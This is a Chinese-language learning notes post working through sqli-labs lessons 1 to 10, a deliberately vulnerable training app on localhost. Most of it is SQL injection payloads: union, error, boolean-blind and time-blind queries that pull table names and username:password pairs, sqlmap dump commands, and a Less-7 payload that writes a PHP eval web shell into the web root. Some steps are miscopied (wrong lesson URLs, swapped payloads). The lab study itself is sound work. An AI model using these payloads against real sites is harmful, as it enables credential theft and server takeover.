sqli-labs学习笔记(Less1-Less10)
sqli-labs学习笔记
- Less-1 GET - Error based - Single quotes - String
- Less-2 GET - Error based - Intiger based
- Less-3 GET - Error based - Single quotes with twist string
- Less-4 GET - Error based - Double Quotes - String
- Less-5 GET - Double Injection - Single Quotes - String
- Less-6 GET - Double Injection - Double Quotes - String
- Less-7 GET - Dump into outfile - String
- Less-8 GET - Blind - Boolian Based - Single Quotes
- Less-9 Blind - Time based. - Single Quotes
- Less-10 GET - Blind - Time based - double quotes
Less-1 GET - Error based - Single quotes - String
select … from … where id=’$id’
基于union联合查询
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’
报错
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ order by 3–+
- 爆出数据库名
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2,database()–+
- 爆出表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
- 爆出列名
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“users”–+
- 爆出字段
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2,group_concat(username,0x3a,password) from users–+
(0x3a:0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’ ,用以分割pasword和username)
使用sqlmap跑:
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” --current-db
- 跑出当前数据库
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security --tables
- 爆出表名
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users --columns
- 爆出列名
sqlmap -u “127.0.0.1/sqli-labs-master/Less-1/?id=1” -D security -T users -C id,password,username --dump
- 爆出字段
Less-2 GET - Error based - Intiger based
当输入id=1‘值时,发现所输入的id值全部都带入进去了
猜测出:select … from … where id=$id
所以,将id=1’中的单引号去掉,然后按less-1的步骤进行报表即可
Payload:
-
爆出数据库栏位,回显错误说明输入栏位大了,回显正确说明栏位小雨或等于此栏位
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 order by 3–+ -
爆出数据库名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0 union select 1,2,database()–+ -
爆出表名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+ -
爆出列名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“users”–+
http://爆出字段
http://127.0.0.1/sqli-labs-master/Less-3/?id=0’) union select 1,2,group_concat(username,0x3a,password) from users–+
Less-3 GET - Error based - Single quotes with twist string
当输入id=1’值时,发现输出的报错会自动加上一个右括号
猜测出:select … from … where id=(’$id’)
,所以,将id=1’中的单引号去掉,然后按less-1的步骤进行报表即可
Payload:
-
爆出数据库栏位
http://127.0.0.1/sqli-labs-master/Less-3/?id=1’)order by 5 --+ -
爆出数据库名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0’) union select 1,2,database()–+ -
爆出表名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+ -
爆出列名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0’) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“users”–+ -
爆出字段
http://127.0.0.1/sqli-labs-master/Less-3/?id=0’) union select 1,2,group_concat(username,0x3a,password) from users–+
Less-4 GET - Error based - Double Quotes - String
当输入id=1’值时,发现不报错,输入id=1”
猜测出:select … from … where id=("$id")
一一
Payload:
-
爆出数据库栏位
http://127.0.0.1/sqli-labs-master/Less-3/?id=1”) order by 3 --+ -
爆出数据库名
http://127.0.0.1/sqli-labs-master/Less-3/?id=0”) union select 1,2,database()–+
-
爆出表名:
http://127.0.0.1/sqli-labs-master/Less-3/?id=0”) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+ -
爆出列名:
http://127.0.0.1/sqli-labs-master/Less-3/?id=0”) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“users”–+ -
爆出字段:
http://127.0.0.1/sqli-labs-master/Less-3/?id=0”) union select 1,2,group_concat(username,0x3a,password) from users–+
Less-5 GET - Double Injection - Single Quotes - String
当输入id=1’时出现
猜测其应该是布尔型盲注、报错型注入、时间延迟型盲注中的一种,构造时间延迟盲注payload:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and sleep(5)–+
发现有明显延迟,说明其是时间延迟注入类型,构造**Payload:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and sleep(5) order by 3–+
时间延迟型手工注入,正确会延迟,错误没有延迟。
本方法中payload = … ?id=1’ and if(报错型payload核心部分,sleep(5),1)–+
- 爆数据库名称长度:
Payload:http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if(length(database())=8,sleep(5),1)–+
明显延迟,数据库名称长8位
- 爆数据库名:
Payload:http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if(left(database(),1)=‘s’,sleep(5),1)–+
明显延迟,数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此**下一个字符,正确匹配时会延迟。最终**得到left(database(),8)=‘security’
- 爆出表名:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)=‘u’ ,sleep(5),1)–+
其中 limit 3,1 中3代表第三个表
一个一个字母的**,最后
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)=‘users’ ,sleep(5),1)–+
明显延迟,说明表名为users
- 爆出列名:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit 4,1),8)=‘username’ ,sleep(5),1)–+
明显延迟,说明存在username列
同理,爆出password列
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit 5,1),8)=‘password’ ,sleep(5),1)–+
- 爆出字段:
Username payload:http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
Password payload:http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
按照id排序,这样便于对应。注意limit 从0开始.通过坚持不懈的尝试终于**到第一个用户的名字dumb,密码dumb,需要注意的是,mysql对大小写不敏感,所以你不知道是Dumb 还是dumb。
可以更改id值,将所有字段都爆出来
最好用sqlmap跑,可以直接爆库
Less-6 GET - Double Injection - Double Quotes - String
双引号字符型注入,上一题的单引号改成双引号就可以了,同样是两种方法:时间延迟型的手工盲注、报错型的手工盲注或者sqlmap
Less-7 GET - Dump into outfile - String
Payload:http://127.0.0.1/sqli-labs-master/Less-7/?id=1’))–+
正常回显,猜测其sql语句:select … from … where id=((’$id’))
-
用第二题查询路径:
Payload:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,@@basedir,@@datadir --+ -
然后上传一句话木马:
http://127.0.0.1/sqli-labs-master/Less-7/?id=-1’)) union select 1,2,’<?php @eval($_POST["hacker"]);?>’ into outfile “/var/www/html/sqli-labs-master/Less-7/hacker.php”–+(linux系统Apache服务器)
然后用菜刀连接:
Less-8 GET - Blind - Boolian Based - Single Quotes
输入id=1时,回显,输入id=1’时不回显,当输入id=1’–+时,回显,所以,可以根据回显来判断,方法如less-5
-
爆出数据库名长度payload:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and length(database())=8–+ -
爆出数据库名payload:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and left((select database()),8)=“security”–+
接下来爆出表名,列名,字段名,按照less-5方法即可
爆出security的表名payload:
-
爆出users
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)=“users”–+ -
爆出users表中的列名和列名:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and left((select column_name from information_schema.columns where table_name=“users” limit 4,1),8)=“username”–+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and left((select column_name from information_schema.columns where table_name=“users” limit 5,1),8)=“password”–+ -
爆出字段:
Username payload:http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and left((select username from users order by id limit 0,1),4)=“dumb”–+
Password payload:http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and left((select password from users order by id limit 0,1),4)=“dumb”–+
按照id排序,改变limit 值,一一爆出所有字段
Less-9 Blind - Time based. - Single Quotes
由此题名可知,是时间延迟盲注型,输入id=1’and sleep(5)–+
存在明显延迟,说明其sql语句是:select … from… where id=’$id’
Payload:
-
爆出数据库栏位数:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and sleep(5) order by 3 --+
存在明显延延迟,当输入order by 后为4时,发现没有延迟,说明栏位数为3
爆出数据库长度:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and sleep(5) and length(database())=8 --+
存在明显延迟,说明正确
爆出数据库名:
其实就是一个一个的尝试,这种方法很耗时间
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and sleep(5) and left(database(),1)=‘s’ --+
明显延迟,继续增加字符数
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and sleep(5) and left(database(),2)=‘se’ --+
…
直到找完8个字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and sleep(5) and left(database(),8)=‘security’ --+ -
爆出列名:
同爆数据库名一样,一个一个的爆
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1 ),1)=‘u’,sleep(3),1)–+
其中limit x,1),y) 中的x代表第几个表,y代表几个字符,一个一个字符的尝试
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)=‘users’,sleep(3),1)–+
爆出我们所需的表名:users -
爆出列名:
同上道理
Username payload:http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit 4,1),8)=‘username’,sleep(3),1)–+
Password payload:http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit 5,1),8)=‘password’,sleep(3),1)–+
爆出字段: -
爆出username列字段:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’,sleep(3),1)–+
爆出password列字段:
http://127.0.0.1/sqli-labs-master/Less-9/?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’,sleep(3),1)–+
同理,一个一个的爆出所有字段
Less-10 GET - Blind - Time based - double quotes
只需把了less-9的id=1’改为id=1”即可,其它都与less-9都一样